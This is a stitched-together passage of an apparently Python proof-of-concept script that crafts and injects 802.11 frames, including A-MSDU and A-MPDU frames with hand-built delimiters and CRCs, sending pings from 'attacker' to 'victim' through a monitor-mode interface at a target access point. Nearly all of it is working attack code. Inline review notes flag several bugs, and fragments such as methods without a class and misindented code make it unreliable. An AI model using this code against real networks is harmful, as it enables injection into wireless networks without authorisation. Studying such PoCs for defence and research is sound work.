    def add_msdu(self, msdu, msdu_len=-1):
        """Append one MSDU to this frame and finalise the frame body.

        Computes the MPDU length (802.11 header + MSDU + 4-byte FCS), builds
        zero padding that aligns that length to 4 octets, derives a CRC-8 over
        the shifted length field and a MAC CRC over ``dot11hdr / msdu``, then
        appends ``msdu / maccrc / frame_padding`` to ``self.data``.

        Args:
            msdu: payload to append; combined with ``self.dot11hdr`` and
                ``self.data`` through the ``/`` operator.
            msdu_len: explicit payload length; ``-1`` (the default) means
                ``len(msdu)``. Any other value is used exactly as given.

        Returns:
            None. Mutates ``self.data`` in place.
        """
        # Default msdu len: -1 is the sentinel for "measure the payload".
        if msdu_len == -1:
            msdu_len = len(msdu)

        mpdu_len = len(self.dot11hdr) + msdu_len + 4  # mac80211 + msdu + FCS

        # NOTE(review): not an f-string, so this prints the literal text
        # "{mpdu_len}" rather than the value. It is also the builtin print,
        # while the rest of the method logs through printd().
        print('MPDU length: {mpdu_len}')

        if mpdu_len % 4 != 0:
            frame_padding = "\x00" * (4 - (mpdu_len % 4))  # Align to 4 octets
            # NOTE(review): frame_padding is a str, not bytes. Whether the
            # "/" operator below accepts text under Python 3 is not visible
            # here -- confirm (the dump code commented out below was
            # Python-2-only, per the author's own note).
            printd("Padding added: ", Level.INFO)
            #for character in str(frame_padding):
            #print "\\x",character.encode('hex'),   #does not work in python3
            #printd("", Level.INFO)
        else:
            frame_padding = ""
            printd("No padding added", Level.INFO)

        sys.stdout.flush()

        # Shift the length into the upper 12 bits of the 16-bit field that is
        # CRC'd below, leaving the low nibble clear (the A-MPDU variant of
        # this method on the same page reads it back with ``mpdu_len >> 4``).
        mpdu_len <<= 4
        # CRC-8 with polynomial x^8 + x^2 + x + 1 (0b100000111), reflected
        # (rev=True), initial value 0, final XOR 0xFF.
        crc_fun = crcmod.mkCrcFun(0b100000111,
                                  rev=True,
                                  initCrc=0x00,
                                  xorOut=0xFF)

        # NOTE(review): ``crc`` is computed but never consumed in this version
        # of the method (no delimiter header is built here), so it is dead
        # work until something uses it.
        crc = crc_fun(struct.pack('<H', mpdu_len))
        # NOTE(review): str() of a packet object under Python 3 yields its
        # text representation rather than raw octets; main() on this page
        # uses bytes(...) for the same purpose -- confirm what dot11crc
        # expects to receive.
        maccrc = dot11crc(str(self.dot11hdr / msdu))

        # the packet already contains the 'rt' and the 'dot11hdr', so only
        # the MSDU, its CRC and the alignment padding are appended here
        self.data = self.data / msdu / maccrc / frame_padding
def main_amsdu():
    """PoC option 2: build one A-MSDU frame and send it ten times.

    Creates an AMSDUPacket with the hard-coded addresses, appends a single
    ping built by ping_packet(), logs the intermediate headers, then calls
    send() ten times with a 0.1 s pause between sends. Unlike main(), the
    counters are advanced once and the same packet object is reused for
    every send. Per the author's note on send(), the interface must be in
    monitor mode.
    """
    count = 1
    ip_count = 0

    # Advanced exactly once here (not per send): count becomes 2,
    # ip_count becomes 1.
    count = (count + 1) % 1024
    ip_count = (ip_count % 255) + 1

    # Ping from attacker --> victim
    # You need to change the MAC addresses and IPs to match the remote AP
    amsdu_pkt = AMSDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
                            '64:D1:A3:3D:26:5B', 0x02)

    printd(clr(Color.YELLOW, "AMSDU Radiotap (rt):"), Level.INFO)
    #sys.stdout.flush()
    #hexdump.hexdump(str(amsdu_pkt.rt))

    #for character in str(amsdu_pkt.rt):
    # this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
    #print "\\x",character.encode('hex'),   #does not work in python3
    #sys.stdout.flush()
    # NOTE(review): this is the builtin print, not printd(), so (unless print
    # is shadowed in this module) it also echoes the Level.INFO value on the
    # same line; printd("", Level.INFO) is what main() uses for a bare
    # linefeed.
    print("", Level.INFO)  #print a linefeed

    printd(clr(Color.YELLOW, "AMSDU dot11hdr:"), Level.INFO)
    #sys.stdout.flush()
    #hexdump.hexdump(str(amsdu_pkt.dot11hdr))
    sys.stdout.flush()

    # add an MSDU: the first argument of ping_packet() is presumably a
    # sequence counter and the last octet of the destination comes from
    # ip_count (always "1" in this function).
    amsdu_pkt.add_msdu(
        ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
    printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
    #sys.stdout.flush()
    #hexdump.hexdump(str(amsdu_pkt))
    sys.stdout.flush()

    printd(clr(Color.YELLOW, "AMSDU data:"), Level.INFO)
    #sys.stdout.flush()
    #hexdump.hexdump(str(amsdu_pkt.data))
    sys.stdout.flush()

    #for character in str(amsdu_pkt.data):
    # this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
    #print "\\x",character.encode('hex'),   #does not work in python3
    #print character, character.encode('hex'),
    # NOTE(review): same builtin-print issue as above.
    print("", Level.INFO)  #print a linefeed

    # send the same packet ten times, 0.1 s apart
    for i in range(0, 10):
        # send the packet
        amsdu_pkt.send()  #the interface has to be in monitor mode
        printd("AMSDU packet sent", Level.INFO)
        time.sleep(0.1)
    def add_msdu(self, msdu, msdu_len=-1):
        """Append one MSDU as an A-MPDU subframe and bump the subframe count.

        Computes the MPDU length (802.11 header + MSDU + 4-byte FCS), builds
        zero padding that aligns it to 4 octets, shifts the length into the
        upper 12 bits of a 16-bit word and derives a CRC-8 over that word,
        then packs a 4-byte delimiter ``<HBB`` = (length word, crc, 0x4E)
        and appends ``ampdu_header / dot11hdr / msdu / maccrc / padding`` to
        ``self.data``. Increments ``self.num_subframes`` on success.

        Args:
            msdu: payload to append; combined with ``self.dot11hdr`` and
                ``self.data`` through the ``/`` operator.
            msdu_len: explicit payload length; ``-1`` (the default) means
                ``len(msdu)``. Any other value is used exactly as given.

        Returns:
            None. Mutates ``self.data`` and ``self.num_subframes``.
        """
        # Default msdu len: -1 is the sentinel for "measure the payload".
        if msdu_len == -1:
            msdu_len = len(msdu)

        mpdu_len = len(self.dot11hdr) + msdu_len + 4  # mac80211 + msdu + FCS

        # print the length of the padding
        #print 'MPDU length: ', mpdu_len    #this worked in python2
        # NOTE(review): not an f-string, so this prints the literal text
        # "{mpdu_len}" rather than the value (builtin print, not printd()).
        print('MPDU length: {mpdu_len}')

        if mpdu_len % 4 != 0:
            frame_padding = "\x00" * (4 - (mpdu_len % 4))  # Align to 4 octets
            # NOTE(review): frame_padding is a str, not bytes; whether the
            # "/" operator below accepts text under Python 3 is not visible
            # here -- confirm.
            printd("Padding added: ", Level.INFO)
            #for character in str(frame_padding):
            #print "\\x",character.encode('hex'),   #does not work in python3
            #printd("", Level.INFO)
        else:
            frame_padding = ""
            #printd("No padding added", Level.INFO)

        sys.stdout.flush()

        # Length occupies the upper 12 bits of the 16-bit delimiter word; the
        # low nibble stays clear (see the commented-out ``mpdu_len >> 4``).
        mpdu_len <<= 4
        # CRC-8 with polynomial x^8 + x^2 + x + 1 (0b100000111), reflected
        # (rev=True), initial value 0, final XOR 0xFF.
        crc_fun = crcmod.mkCrcFun(0b100000111,
                                  rev=True,
                                  initCrc=0x00,
                                  xorOut=0xFF)

        crc = crc_fun(struct.pack('<H', mpdu_len))
        # NOTE(review): str() of a packet object under Python 3 yields its
        # text representation rather than raw octets; main() on this page
        # uses bytes(...) for the same purpose -- confirm what dot11crc
        # expects to receive.
        maccrc = dot11crc(str(self.dot11hdr / msdu))
        delim_sig = 0x4E  # ASCII 'N': the MPDU delimiter signature byte

        #print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))
        #hexdump(maccrc)
        # Delimiter layout, little-endian: 2-byte length word, 1-byte CRC-8,
        # 1-byte signature. struct.pack returns bytes under Python 3 (a str
        # under Python 2).
        ampdu_header = struct.pack(
            '<HBB', mpdu_len, crc, delim_sig
        )  #'pack' returns a string containing the given values, packed according to the given format
        #hexdump(ampdu_header)

        # Unlike the A-MSDU variant, the delimiter and the 802.11 header are
        # both re-emitted in front of every subframe.
        self.data = self.data / ampdu_header / self.dot11hdr / msdu / maccrc / frame_padding

        self.num_subframes += 1
def main():
    """PoC option 1: send ten plain 802.11 frames, each carrying one MSDU.

    Every iteration builds a fresh Dot11Packet with the hard-coded addresses,
    dumps its Radiotap and 802.11 headers, appends a ping built by
    ping_packet() with rolling counters, sends the frame and sleeps 0.1 s.
    Per the author's note on send(), the interface must be in monitor mode.
    """
    count = 1
    ip_count = 1

    # send the packet a number of times
    for i in range(0, 10):
        # Roll the first ping_packet() argument (presumably a sequence
        # counter, mod 1024) and the last destination octet (1..255).
        count = (count + 1) % 1024
        ip_count = (ip_count % 255) + 1

        # Create an empty packet (Radiotap + dot11 header)
        pkt = Dot11Packet('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
                          '64:D1:A3:3D:26:5B')

        # dump the radiotap header (bytes(), not str(): see the Python 3
        # notes elsewhere in this file)
        printd(clr(Color.YELLOW, "Radiotap:"), Level.INFO)
        hexdump.hexdump(bytes(pkt.rt), result='print')
        printd("", Level.INFO)  #print a linefeed

        # print the radiotap header in this format:
        #	"\x00\x00\x12\x00\x2e\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6c\x62\x27\x6c\x5c\x74\x27\xc0\x00\xc0\x01\x00\x00"
        # NOTE(review): ''.join(...) over a single str returns it unchanged,
        # so the join is a no-op; the format() call alone produces "\xNN".
        for my_bytes in bytes(pkt.rt):
            print(''.join('\\x{:02x}'.format(my_bytes)), end='', flush=True)
        printd("", Level.INFO)  #print a linefeed
        printd("", Level.INFO)  #print a linefeed

        # print the 802.11 header
        printd(clr(Color.YELLOW, "802.11 hdr:"), Level.INFO)
        hexdump.hexdump(bytes(pkt.dot11hdr), result='print')
        sys.stdout.flush()

        # add an MSDU to the packet
        pkt.add_msdu(
            ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
        printd(clr(Color.YELLOW, "MSDU added:"), Level.INFO)
        #sys.stdout.flush()
        #hexdump.hexdump(str(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))))
        sys.stdout.flush()

        printd(clr(Color.YELLOW, "Radiotap + 802.11 hdr + MSDU + CRC:"),
               Level.INFO)
        #sys.stdout.flush()
        #hexdump.hexdump(str(pkt.data))
        sys.stdout.flush()

        #for character in str(pkt.data):
        # this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
        #print "\\x",character.encode('hex'),    #does not work in python3
        #print character, character.encode('hex'),
        #print("", Level.INFO) #print a linefeed

        # send the packet
        pkt.send()  #the interface has to be in monitor mode
        printd("packet sent", Level.INFO)
        time.sleep(0.1)
def main_ampdu():
    # "Requests" Python library: http://docs.python-requests.org/en/master/user/advanced/
    #session = requests.Session()
    count = 1
    ip_count = 0

    printd(clr(Color.BLUE, "Building container..."), Level.INFO)
    """ Build container """
    container = ''
    for i in range(0, 2):
        count = (count + 1) % 1024
        ip_count = (ip_count % 255) + 1

        # Ping from attacker --> victim
        # You need to change the MAC addresses and IPs to match the remote AP
        ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
                                '64:D1:A3:3D:26:5B', 0x02)

        printd(clr(Color.YELLOW, "Radiotap (rt):"), Level.INFO)
        #sys.stdout.flush()
        #hexdump.hexdump(str(ampdu_pkt.rt))  #this was valid for python2
        #hexdump.hexdump(bytes(ampdu_pkt.rt))

        #for character in str(ampdu_pkt.rt):
        # this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
        #print "\\x",character.encode('hex'),   #does not work in python3
        #sys.stdout.flush()
        print("", Level.INFO)  #print a linefeed

        printd(clr(Color.YELLOW, "dot11hdr:"), Level.INFO)
        #sys.stdout.flush()
        #hexdump.hexdump(str(ampdu_pkt.dot11hdr))
        sys.stdout.flush()

        # add an MSDU to the AMPDU
        ampdu_pkt.add_msdu(
            ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
        printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
        #sys.stdout.flush()
        #hexdump.hexdump(str(ampdu_pkt))
        sys.stdout.flush()

        ampdu_pkt.add_padding(8)
        printd(
            clr(Color.YELLOW,
                "AMPDU with MSDU and 8 padding delimiters added:"), Level.INFO)
        #sys.stdout.flush()
        #hexdump.hexdump(str(ampdu_pkt))
        sys.stdout.flush()

        container += str(ampdu_pkt)

        # Beacon from attacker --> victim
        #ampdu_pkt = ssid_packet()
        #container += str(ampdu_pkt)

        # Ping from victim --> access point
        #ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19')
        #ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count)))
        #ampdu_pkt.add_padding(8)
        #container += str(ampdu_pkt)
    """ end package """
    printd(clr(Color.BLUE, "Final A-MPDU built:"), Level.INFO)
    sys.stdout.flush()

    #hexdump.hexdump('\x00'*16)
    #hexdump.hexdump("Hello world")
    hexdump.hexdump(container)
    sys.stdout.flush()

    #for character in container:
    # this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
    #print "\\x",character.encode('hex'),   #does not work in python3
    #print character, character.encode('hex'),
    print("", Level.INFO)  #print a linefeed

    # send the packet a number of times
    for i in range(0, 10):
        # send the packet
        ampdu_pkt.send()  #the interface has to be in monitor mode
        printd("packet sent", Level.INFO)
        time.sleep(0.1)
    """
            printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
            pass
        except Exception:
            printd(clr(Color.RED, "Another exception"), Level.CRITICAL)
            pass
    """


# Script entry point: a text menu that dispatches to one of the three PoC
# drivers. Only KeyboardInterrupt is handled; any other exception raised by
# a driver (e.g. a send() failure) propagates with a traceback.
if __name__ == "__main__":
    try:
        #pocnum = raw_input("option 1: send normal packets. " # this was valid in Python2
        #                   "option 2: send AMSDUs. "
        #                   "option 3: send AMPDUs. "
        #                   "Choice: ")
        # Adjacent string literals are concatenated into a single prompt.
        pocnum = input(
            "option 1: send normal packets. "  # this is valid in Python3
            "option 2: send AMSDUs. "
            "option 3: send AMPDUs. "
            "Choice: ")
        # input() returns a str, so the comparison is against the text
        # "1"/"2"/"3"; surrounding whitespace is not stripped.
        if pocnum == "1":
            main()
        elif pocnum == "2":
            main_amsdu()
        elif pocnum == "3":
            main_ampdu()
        else:
            printd("Invalid PoC number.", Level.CRITICAL)

    except KeyboardInterrupt:
        printd("\nExiting...", Level.INFO)
 def dump_to_file(self):
     """Write str(self) repeated 250 times to 'ampdu.bin' in the working directory.

     The log line is emitted after the file is opened and before anything
     is written, so it appears even if the write fails.

     NOTE(review): the file is opened in text mode ('w') and the content is
     str(self); under Python 3 that is the object's text representation,
     not raw frame octets -- confirm the intended format of ampdu.bin.
     """
     with open('ampdu.bin', 'w') as f:
         printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO)
         f.write(str(self) * 250)